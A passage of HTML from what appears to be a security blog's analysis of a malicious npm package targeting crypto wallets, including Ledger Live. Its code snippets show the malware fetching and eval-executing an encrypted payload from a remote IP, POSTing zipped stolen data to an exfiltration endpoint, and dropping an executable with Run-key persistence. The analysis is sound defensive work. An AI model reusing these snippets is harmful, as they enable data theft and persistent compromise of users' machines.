1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_ea9331e3c3b3cbf9631b9a3d95f698f5\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_ea9331e3c3b3cbf9631b9a3d95f698f5\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">http.get(&#039;http:\/\/45.32.150.251\/get_arhive_npm\/wBTsMvl78kbdYOVuAeE0Fw%3D%3D&#039;, (res) =&gt; {\r\n  \/\/ download archive\r\n});\r\n\r\nconst _decipher = crypto.createDecipheriv(&#039;aes-128-cbc&#039;, _key, _iv);\r\nconst _decryptedData = Buffer.concat([\r\n  _decipher.update(Buffer.from(_data)),\r\n  _decipher.final()\r\n]);\r\n\r\nchildProcess.exec(`${path_node_g} -e &quot;eval(atob(&#039;${_script}&#039;))&quot;`);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Exfiltration, Ledger targeting, and persistence<\/h3>\n\n\n\n<p>Finally, the staged data is compressed into a ZIP archive and sent to a dedicated exfiltration endpoint at <code>208[.]85[.]20[.]124:80\/wall<\/code>, with retry logic if the upload fails.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_9d7171e039dc50b91657b1eb4efc84d6\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_9d7171e039dc50b91657b1eb4efc84d6\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">const zip = new AdmZip();\r\nzip.addLocalFolder(_tempF);\r\nlet willSendThis = zip.toBuffer();\r\n\r\nconst options = {\r\n  hostname: &quot;208.85.20.124&quot;,\r\n  port: 80,\r\n  path: &quot;\/wall&quot;,\r\n  method: &quot;POST&quot;\r\n};\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The payload also contains Ledger-specific logic. If Ledger Live is present under <code>%APPDATA%<\/code>, it downloads an additional executable from <code>http[:]\/\/45[.]32[.]150[.]251\/led-win32<\/code>, writes it to <code>%TEMP%\\TvVdSR.exe<\/code>, creates a Run key named UpdateLedger, and launches the dropped file.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_a784dca36d9164ba77e502b39260dc0e\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_a784dca36d9164ba77e502b39260dc0e\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">if (fs.existsSync(path.join(process.env.APPDATA, &quot;Ledger Live&quot;))) {\r\n  http.get(&quot;http:\/\/45.32.150.251\/led-win32&quot;, (res) =&gt; {\r\n    const _path = path.join(process.env.TEMP, &quot;TvVdSR.exe&quot;);\r\n    fs.writeFileSync(_path, data);\r\n\r\n    const ps1 = `$rPath = &#039;HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run&#039;;\r\n      New-ItemProperty -Path $rPath -Name &#039;UpdateLedger&#039; -PropertyType String -Value &#039;${_path}&#039; -Force`;\r\n  });\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>In addition, the decoded payload builds a second-stage persistence script named script_zombi. That script writes files under <code>%APPDATA%<\/code>, creates a hidden PowerShell-based startup path, creates a scheduled task named UpdateApp, and adds a <code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/code> entry so the malware is relaunched on user logon and survives reboots.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"auto\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 